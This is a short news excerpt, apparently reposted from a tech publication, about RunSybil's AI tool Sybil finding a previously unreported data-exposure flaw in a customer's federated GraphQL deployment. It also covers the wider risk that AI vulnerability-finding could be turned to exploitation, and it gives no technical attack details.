AI models are getting so good at finding vulnerabilities that some experts say the tech industry might need to rethink how software is built.
Vlad Ionescu and Ariel Herbert-Voss, cofounders of the cybersecurity startup RunSybil, were momentarily confused when their AI tool, Sybil, alerted them to a weakness in a customer’s systems last November.
Sybil uses a mix of different AI models—as well as a few proprietary technical tricks—to scan computer systems for issues that hackers might exploit, like an unpatched server or a misconfigured database.
In this case, Sybil flagged a problem with the customer’s deployment of federated GraphQL, a language used to specify how data is accessed over the web through application programming interfaces (APIs). The issue meant that the customer was inadvertently exposing confidential information.
What puzzled Ionescu and Herbert-Voss was that spotting the issue required a remarkably deep knowledge of several different systems and how those systems interact. RunSybil says it has since found the same problem with other deployments of GraphQL—before anybody else made it public “We scoured the internet, and it didn’t exist,” Herbert-Voss says. “Discovering it was a reasoning step in terms of models’ capabilities—a step change.”
The situation points to a growing risk. As AI models continue to get smarter, their ability to find zero-day bugs and other vulnerabilities also continues to grow. The same intelligence that can be used to detect vulnerabilities can also be used to exploit them.
...read more at archive.is
pull down to refresh
related posts